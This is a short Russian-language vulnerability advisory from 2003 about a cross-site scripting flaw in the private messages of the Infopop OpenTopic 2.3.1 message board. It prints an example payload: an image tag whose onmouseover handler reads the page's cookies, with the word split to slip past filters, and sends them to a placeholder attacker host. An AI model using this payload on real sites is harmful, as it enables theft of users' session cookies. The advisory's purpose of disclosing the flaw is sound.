Межсайтовый скриптинг в OpenTopic

Дата публикации:
10.01.2003
Всего просмотров:
645
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Infopop OpenTopic (http://www.infopop.com) – коммерческая доска объявлений от Infopop.

Как сообщается, OpenTopic не санирует HTML код при постинге частных сообщений. Когда жертва просматривает частное сообщение, любой злонамеренный код будет выполнен в его Web браузере в контексте безопасности OpenTopic сайта. Уязвимость может использоваться для кражи идентификационных данных, хранящихся в куки. Пример:

http://[target]/OpenTopic?a=ugtpc ).
XSS to get cookie :
[IMG]http://[website]/img.gif"width="750"height="750"onmouseover="a=document[
'coo'+'kie'];location='http://[attacker]/?'+a;[/IMG]
Уязвимость обнаружена в Infopop OpenTopic 2.3.1

Ссылки: OpenTopic security hole
или введите имя

CAPTCHA